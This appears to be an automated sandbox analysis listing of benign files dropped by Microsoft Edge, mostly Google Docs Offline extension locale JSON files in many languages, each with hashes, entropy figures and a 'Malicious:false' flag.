                                                                                                                                                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):959
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):968
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):838
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):911
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):939
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):972
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):935
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2771
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):899
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1160
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                      MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                      SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                      SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                      SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3264
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                      MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                      SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                      SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                      SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3235
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                      MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                      SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                      SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                      SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3122
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                      MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                      SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                      SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                      SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1895
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                      MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                      SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
